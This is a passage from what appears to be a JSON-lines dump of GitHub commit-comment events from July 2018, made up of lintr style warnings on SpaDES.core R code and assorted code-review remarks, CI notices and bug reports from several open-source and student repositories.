^~~~~~\n```\n[R/module-dependencies-methods.R:68:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/module-dependencies-methods.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.out <<- rbindlist(list(sim.out, z.out), use.names = TRUE)\n        ^~~~~~~\n```\n[R/module-dependencies-methods.R:80:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/module-dependencies-methods.R#L80) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- dx[, list(from = module, to = i.module,\n    ^~\n```\n[R/module-dependencies-methods.R:83:15:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/module-dependencies-methods.R#L83) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (plot) DT <- DT[!duplicated(DT[, 1:2, with = FALSE]), ]\n              ^~\n```\n[R/module-dependencies-methods.R:85:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/module-dependencies-methods.R#L85) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- data.table(from = character(0), to = character(0),\n    ^~\n```\n[R/module-dependencies-methods.R:164:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/module-dependencies-methods.R#L164) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    M <- distances(simGraph, mode = \"out\")\n    ^\n```\n[R/module-dependencies-methods.R:196:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/module-dependencies-methods.R#L196) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​      missingObjects <- simEdgeList %>% filter(from != to) %>%\n                                    ~~^\n```\n[R/module-dependencies-methods.R:210:26:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/module-dependencies-methods.R#L210) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​    return(newEdgeList %>% data.table() %>% setorder(\"from\", \"to\", \"objName\"))\n                       ~~^\n```\n[R/module-dependencies-methods.R:246:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/module-dependencies-methods.R#L246) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​              loadOrder <- names(simGraph[[tsort, ]]) %>% .[!(. %in% \"_INPUT_\" )]\n                                                                              ^\n```\n[R/module-repository.R:28:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/module-repository.R#L28) *style:* **Lines should not be more than 100 characters.**\n```r\n​#'          (\\url{http://spades-core.predictiveecology.org/articles/ii-modules.html#module-directory-structure-modulename}),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:52:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/module-repository.R#L52) *style:* **Lines should not be more than 100 characters.**\n```r\n​    zipFiles <- grep(file.path(name, \"data\"), zipFiles, invert = TRUE, value = TRUE) # remove any zip in data folder\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:293:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/module-repository.R#L293) *style:* **Commented code should be removed.**\n```r\n​      #versionWarning(name, version)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:305:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/module-repository.R#L305) *style:* **Lines should not be more than 100 characters.**\n```r\n​        GET(zip, ua, config = list(config(token = pat)), write_disk(localzip, overwrite = overwrite))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:401:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/module-repository.R#L401) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/module-repository.R:402:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/module-repository.R#L402) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/moduleMetadata.R:75:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/moduleMetadata.R#L75) *style:* **Commented code should be removed.**\n```r\n​    #metadata <- eval(parse(text = x)) # can't be used because can't evaluate start(sim)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:78:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/plotting-diagrams.R#L78) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- tail(completed(sim), n)\n    ^~\n```\n[R/plotting-diagrams.R:173:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/plotting-diagrams.R#L173) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​        sapply(ll, NROW) %>% sum() %>% `*`(., 26L)\n                         ~~^\n```\n[R/plotting-diagrams.R:325:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/plotting-diagrams.R#L325) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      PlotRemovingDots <- function(modDia, plotFn, axes, ...,\n      ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:326:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/plotting-diagrams.R#L326) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.color,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:327:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/plotting-diagrams.R#L327) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size,\n                                   ^~~~~~~~~~~\n```\n[R/plotting-diagrams.R:328:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/plotting-diagrams.R#L328) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size2,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:329:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/plotting-diagrams.R#L329) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.shape,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:330:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/plotting-diagrams.R#L330) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.cex,\n                                   ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:331:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/plotting-diagrams.R#L331) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.family,\n                                   ^~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:345:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/plotting-diagrams.R#L345) *style:* **Lines should not be more than 100 characters.**\n```r\n​          c(nchar(namesModDia)^0.8 * 10) # use exponential to stretch out, and multiplication to make all bigger\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting.R:6:31:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                              ^~~~~~~~\n```\n[R/plotting.R:6:41:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                                        ^~~~~~~~~~\n```\n[R/plotting.R:37:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                        ^~~~~~~~\n```\n[R/plotting.R:37:35:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                                  ^~~~~~~~~~\n```\n[R/plotting.R:86:22:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                    ~^~\n```\n[R/plotting.R:86:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                                                      ~^~\n```\n[R/plotting.R:87:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n          ~^~\n```\n[R/plotting.R:87:40:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                      ~^~\n```\n[R/plotting.R:87:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                                                        ~^~\n```\n[R/POM.R:131:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/POM.R#L131) *style:* **Lines should not be more than 100 characters.**\n```r\n​#' @param objFnCompare Character string. Either, \"MAD\" or \"RMSE\" indicating that inside the objective\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:189:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/POM.R#L189) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​           NaNRetries = NA, logObjFnVals = FALSE, weights, useLog = FALSE) {\n           ^~~~~~~~~~\n```\n[R/POM.R:199:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/POM.R#L199) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        NaNRetries, logObjFnVals, weights, useLog) {\n                        ^~~~~~~~~~\n```\n[R/POM.R:216:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/POM.R#L216) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (is.na(NaNRetries)) NaNRetries <- 1\n                           ^~~~~~~~~~\n```\n[R/POM.R:240:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/POM.R#L240) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​          sim_ <- Copy(sim)\n          ^~~~\n```\n[R/POM.R:258:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/POM.R#L258) *style:* **Put spaces around all infix operators.**\n```r\n​          envPOMCalled <- sys.frame(min(grep(\"POM\", sys.calls()))-1)\n                                                                ~^~\n```\n[R/POM.R:325:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/POM.R#L325) *style:* **Lines should not be more than 100 characters.**\n```r\n​          cat(format(unlist(lapply(objectiveRes, function(x) x[[\"value\"]])), digits = 4), dep = \"\\t\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:363:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/c370f3195f8c667e0465d560019f2033cafab8ee/R/POM.R#L363) *style:* **Lines should not be more than 100 characters.**\n```r\n​      par[whP] <- unlist(deps[[modName]]@parameters$default[deps[[modName]]@parameters$paramName == names(P(sim, modName)[whParamsByMod[whP]])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2018-07-30T19:45:02Z"}
{"id":"8039880400","type":"CommitCommentEvent","actor":{"login":"pmelange"},"repo":{"name":"freifunk-berlin/firmware-packages"},"payload":{"comment":{"id":29892771,"position":null,"line":null,"path":null,"commit_id":"c633c7c051c1aa35eb3b656c5af2743c25885d7b","created_at":"2018-07-30T19:45:46Z","updated_at":"2018-07-30T19:45:46Z","author_association":"CONTRIBUTOR","body":"Thanks, I was not in the city all weekend.  I would have done it tomorrow."}},"created_at":"2018-07-30T19:45:46Z"}
{"id":"8039882219","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AShalysh/Blackjack"},"payload":{"comment":{"id":29892777,"position":83,"line":76,"path":"main_program.rb","commit_id":"a51ad800690f0e89484a01d2d9f80f79149ea759","created_at":"2018-07-30T19:46:09Z","updated_at":"2018-07-30T19:46:09Z","author_association":"NONE","body":"здесь и далее в этом методе встречаются магические операции с магическими цифрами )\r\nлучше, если эта строка будет выглядеть как-то так: `@dealer.take_bets` (ну или любое другое название)\r\n\r\nмысль в следующем:\r\n - цифры записать в какие-то константы\r\n- в программе не проводить прямые операции с аттрибутами объекта (помнишь в железной дороге старались не писать аксессоры, ридеры - отдельно, райтеры - по заданию и обычно \"не прямые\", т.е. аттрибуты могли меняться только с помощью специальных методов)"}},"created_at":"2018-07-30T19:46:09Z"}
{"id":"8039886754","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29892781,"position":282,"line":282,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/interface.rb","commit_id":"45d07f947962ab51864c04f6bfd7061e49f19e91","created_at":"2018-07-30T19:47:01Z","updated_at":"2018-07-30T19:47:01Z","author_association":"NONE","body":"Как у поезда может быть метод \"каждый поезд\". Тут наверно должен быть each_wagon"}},"created_at":"2018-07-30T19:47:01Z"}
{"id":"8039887132","type":"CommitCommentEvent","actor":{"login":"PSRCode"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29892782,"position":83,"line":1631,"path":"tests/utils/utils.sh","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T19:47:04Z","updated_at":"2018-07-30T19:47:04Z","author_association":"NONE","body":"Sure but most usage of the return value from other utility function caller end up bubbling up return value for nothing since most of the time the ret value is \"overwritten\" by subsequent function calls. \r\n\r\nWe can take care of this outside of this commit. Leave it like that for now."}},"created_at":"2018-07-30T19:47:04Z"}
{"id":"8039887481","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29892783,"position":286,"line":286,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/interface.rb","commit_id":"45d07f947962ab51864c04f6bfd7061e49f19e91","created_at":"2018-07-30T19:47:08Z","updated_at":"2018-07-30T19:47:08Z","author_association":"NONE","body":"Как у поезда может быть метод \"каждый поезд\". Тут наверно должен быть each_wagon"}},"created_at":"2018-07-30T19:47:08Z"}
{"id":"8039903629","type":"CommitCommentEvent","actor":{"login":"sahil107"},"repo":{"name":"travis-ci/dpl"},"payload":{"comment":{"id":29892812,"position":null,"line":null,"path":null,"commit_id":"9d4499de0be4dc9aa192a5f18a97afdb3e69857b","created_at":"2018-07-30T19:49:51Z","updated_at":"2018-07-30T19:49:51Z","author_association":"NONE","body":"9d4499d"}},"created_at":"2018-07-30T19:49:51Z"}
{"id":"8039903928","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AShalysh/Blackjack"},"payload":{"comment":{"id":29892813,"position":83,"line":76,"path":"main_program.rb","commit_id":"a51ad800690f0e89484a01d2d9f80f79149ea759","created_at":"2018-07-30T19:49:54Z","updated_at":"2018-07-30T19:49:54Z","author_association":"NONE","body":"будет правильно для всех операций с деньгами выделить специальный класс, к примеру Банк\r\nэтот класс:\r\n- знает размеры ставок\r\n- знает что и кому причитается при наступлении события \"победа\", \"проигрыш\", \"ничья\" \r\n- \"распределяет средства\" между игроками через методы класса Игрок"}},"created_at":"2018-07-30T19:49:54Z"}
{"id":"8039910024","type":"CommitCommentEvent","actor":{"login":"stnava"},"repo":{"name":"ANTsX/ANTs"},"payload":{"comment":{"id":29892824,"position":null,"line":null,"path":null,"commit_id":"b872ef3bd154998377c100fa75788140fc491a39","created_at":"2018-07-30T19:50:57Z","updated_at":"2018-07-30T19:50:57Z","author_association":"MEMBER","body":"Itk accepted my pull request for a less stringent minimum number of points\n\nOn Mon, Jul 30, 2018, 15:43 Philip Cook <notifications@github.com> wrote:\n\n> The link seems to be about smoothing? Did they fix the metric sampling\n> floor in the same patch?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ANTsX/ANTs/commit/b872ef3bd154998377c100fa75788140fc491a39#commitcomment-29892748>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AATyftFMCyt5PNPZC2xAJQdprOB7XTYNks5uL2HegaJpZM4VnC2L>\n> .\n>\n"}},"created_at":"2018-07-30T19:50:57Z"}
{"id":"8039911490","type":"CommitCommentEvent","actor":{"login":"Mark90"},"repo":{"name":"Attumm/redis-dict"},"payload":{"comment":{"id":29892825,"position":60,"line":48,"path":"redis_dict.py","commit_id":"002d7e0964fbf47f1b2f28df4faf6c0c8bee7855","created_at":"2018-07-30T19:51:15Z","updated_at":"2018-07-30T19:51:15Z","author_association":"CONTRIBUTOR","body":"Nice"}},"created_at":"2018-07-30T19:51:15Z"}
{"id":"8039912964","type":"CommitCommentEvent","actor":{"login":"punkusha"},"repo":{"name":"stasgm/qb-test"},"payload":{"comment":{"id":29892827,"position":4,"line":8,"path":"src/App.tsx","commit_id":"3d1c87ef4e6cca2a9a392f028c4ed07f57e01600","created_at":"2018-07-30T19:51:32Z","updated_at":"2018-07-30T19:51:32Z","author_association":"NONE","body":"use \"is\" and \"has\" prefix for boolean functions (not for prop type names that are considered to be booleans)"}},"created_at":"2018-07-30T19:51:32Z"}
{"id":"8039914658","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29892830,"position":83,"line":1631,"path":"tests/utils/utils.sh","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T19:51:52Z","updated_at":"2018-07-30T19:51:52Z","author_association":"OWNER","body":"----- On Jul 30, 2018, at 3:47 PM, Jonathan Rajotte Julien <notifications@github.com> wrote: \n\n> Sure but most usage of the return value from other utility function caller end\n> up bubbling up return value for nothing since most of the time the ret value is\n> \"overwritten\" by subsequent function calls.\n\n> We can take care of this outside of this commit. Leave it like that for now.\nThere are cases where the return value of similar functions from utils.sh is used to \nconditionally delete the generated trace or not in the caller. But only in some cases. \n\nWe can indeed keep this for a separate commit. \n\nThanks, \n\nMathieu \n\n-- \nMathieu Desnoyers \nEfficiOS Inc. \nhttp://www.efficios.com \n"}},"created_at":"2018-07-30T19:51:52Z"}
{"id":"8039915205","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29892834,"position":283,"line":283,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/interface.rb","commit_id":"45d07f947962ab51864c04f6bfd7061e49f19e91","created_at":"2018-07-30T19:51:59Z","updated_at":"2018-07-30T19:51:59Z","author_association":"NONE","body":"reserve - в твоей имплементации, это метод, который занимает места. И он принимает аргумент. Тут ты просто хочешь вывести кол-во свободных мест. И у тебя определен ридер для этого в классе Wagon"}},"created_at":"2018-07-30T19:51:59Z"}
{"id":"8039915208","type":"CommitCommentEvent","actor":{"login":"debpaul"},"repo":{"name":"tkphd/OpenRefine-ecology-lesson"},"payload":{"comment":{"id":29892833,"position":null,"line":null,"path":null,"commit_id":"d3bb72575e577e20b94d9de1cb1ac8f36ad6aa0f","created_at":"2018-07-30T19:51:59Z","updated_at":"2018-07-30T19:51:59Z","author_association":"NONE","body":"Thanks @tkphd for sharing how to make faceting clearer. We've reviewed your request and do think we need to add a bit more about what a facet is, and perhaps have a screenshot. I think we will find a different analogy other than shopping though."}},"created_at":"2018-07-30T19:51:59Z"}
{"id":"8039915286","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29892835,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-30T19:52:00Z","updated_at":"2018-07-30T19:52:00Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-30T19:52:00Z"}
{"id":"8039915693","type":"CommitCommentEvent","actor":{"login":"Attumm"},"repo":{"name":"Attumm/redis-dict"},"payload":{"comment":{"id":29892836,"position":155,"line":123,"path":"redis_dict.py","commit_id":"002d7e0964fbf47f1b2f28df4faf6c0c8bee7855","created_at":"2018-07-30T19:52:05Z","updated_at":"2018-07-30T19:52:05Z","author_association":"OWNER","body":"Well done, nice catch.\r\nWill write a test."}},"created_at":"2018-07-30T19:52:05Z"}
{"id":"8039918326","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29892837,"position":287,"line":287,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/interface.rb","commit_id":"45d07f947962ab51864c04f6bfd7061e49f19e91","created_at":"2018-07-30T19:52:39Z","updated_at":"2018-07-30T19:52:39Z","author_association":"NONE","body":"reserve - в твоей имплементации, это метод, который занимает места. И он принимает аргумент. Тут ты просто хочешь вывести занятый объем в вагоне. И у тебя определен ридер для этого в классе Wagon\r\n\r\n"}},"created_at":"2018-07-30T19:52:39Z"}
{"id":"8039923293","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29892848,"position":null,"line":null,"path":null,"commit_id":"685d36dacc852127571bb8f92b2b9c4cb2a7700c","created_at":"2018-07-30T19:53:41Z","updated_at":"2018-07-30T19:53:41Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 565](https://ci.hashicorp.engineering/viewLog.html?buildId=107737&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-30T19:53:41Z"}
{"id":"8039924767","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29892852,"position":null,"line":null,"path":null,"commit_id":"685d36dacc852127571bb8f92b2b9c4cb2a7700c","created_at":"2018-07-30T19:53:59Z","updated_at":"2018-07-30T19:53:59Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 565](https://ci.hashicorp.engineering/viewLog.html?buildId=107737&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:17"}},"created_at":"2018-07-30T19:53:59Z"}
{"id":"8039926383","type":"CommitCommentEvent","actor":{"login":"kerizane"},"repo":{"name":"Tuxemon/Tuxemon"},"payload":{"comment":{"id":29892858,"position":null,"line":null,"path":null,"commit_id":"d84dc85f6372d4a3653e97543e68fa5cee1a9afb","created_at":"2018-07-30T19:54:18Z","updated_at":"2018-07-30T19:54:18Z","author_association":"CONTRIBUTOR","body":"This commit breaks the game for me. Black screen then immediate crash.\r\n\r\nTraceback (most recent call last):\r\n  File \"tuxemon.py\", line 50, in <module>\r\n    tuxemon.core.main.main(load_slot=args.slot)\r\n  File \"/home/k/Tuxemon/tuxemon/core/main.py\", line 98, in main\r\n    control.main()\r\n  File \"/home/k/Tuxemon/tuxemon/core/control.py\", line 572, in main\r\n    update(dt)\r\n  File \"/home/k/Tuxemon/tuxemon/core/control.py\", line 624, in update\r\n    self.update_states(time_delta)\r\n  File \"/home/k/Tuxemon/tuxemon/core/control.py\", line 646, in update_states\r\n    state.resume()\r\n  File \"/home/k/Tuxemon/tuxemon/core/components/menu/menu.py\", line 517, in resume\r\n    self.refresh_layout()\r\n  File \"/home/k/Tuxemon/tuxemon/core/components/menu/menu.py\", line 307, in refresh_layout\r\n    self.menu_items.expand = not self.shrink_to_items\r\nAttributeError: 'StartState' object has no attribute 'menu_items'"}},"created_at":"2018-07-30T19:54:18Z"}
{"id":"8039926384","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29892859,"position":4,"line":4,"path":"1-Osnovy-Ruby-polnaya-PO/lesson7/passenger_wagon.rb","commit_id":"45d07f947962ab51864c04f6bfd7061e49f19e91","created_at":"2018-07-30T19:54:18Z","updated_at":"2018-07-30T19:54:18Z","author_association":"NONE","body":"см CargoWagon."}},"created_at":"2018-07-30T19:54:18Z"}
{"id":"8039927892","type":"CommitCommentEvent","actor":{"login":"LiquidZulu"},"repo":{"name":"aurelcamp/aurelcamp.github.io"},"payload":{"comment":{"id":29892865,"position":null,"line":null,"path":null,"commit_id":"ad99fe3c06374e6e1e509d84e6291f54d2e25d5a","created_at":"2018-07-30T19:54:35Z","updated_at":"2018-07-30T19:54:35Z","author_association":"NONE","body":"Is this supposed to be public?"}},"created_at":"2018-07-30T19:54:35Z"}
{"id":"8039933744","type":"CommitCommentEvent","actor":{"login":"uesley"},"repo":{"name":"uesley/xpert"},"payload":{"comment":{"id":29892873,"position":127,"line":302,"path":"src/view/FormInserirProjeto.java","commit_id":"a8d7c4f3de9d7bef4459e9eb1a4bea80e95bfe7a","created_at":"2018-07-30T19:55:41Z","updated_at":"2018-07-30T19:55:41Z","author_association":"OWNER","body":"kkkkkkkkkkkkk"}},"created_at":"2018-07-30T19:55:41Z"}
{"id":"8039933847","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AShalysh/Blackjack"},"payload":{"comment":{"id":29892874,"position":81,"line":74,"path":"main_program.rb","commit_id":"a51ad800690f0e89484a01d2d9f80f79149ea759","created_at":"2018-07-30T19:55:43Z","updated_at":"2018-07-30T19:55:43Z","author_association":"NONE","body":"длинный блок условий на самом деле нужно выносить отдельно в метод, который определит победителя\r\nобрати внимание - код в строках 75-76 повторяется в 88-89, аналогично 78-79 и 85-86\r\nт.е. это тоже кандидаты на отдельные методы, которые будут вызваны в зависимости от \"победа\", \"поражение\", \"ничья\", которые вернет метод, описанный мной выше\r\nт.е. в методе \"опэн\" функционал минимум на 3 метода"}},"created_at":"2018-07-30T19:55:43Z"}
{"id":"8039933895","type":"CommitCommentEvent","actor":{"login":"claudioandre-br"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":29892875,"position":9,"line":569,"path":"src/dynamic_compiler.c","commit_id":"bf2048be86c352efdd02b107687a464937c81bd3","created_at":"2018-07-30T19:55:44Z","updated_at":"2018-07-30T19:55:44Z","author_association":"COLLABORATOR","body":"> off-by-one buffer write\r\n\r\nI won't say this is an off-by-one buffer overflow because `gen_conv[]` is a big buffer. Anyway, the commit created three new functions, one of them is `pad17()`."}},"created_at":"2018-07-30T19:55:44Z"}
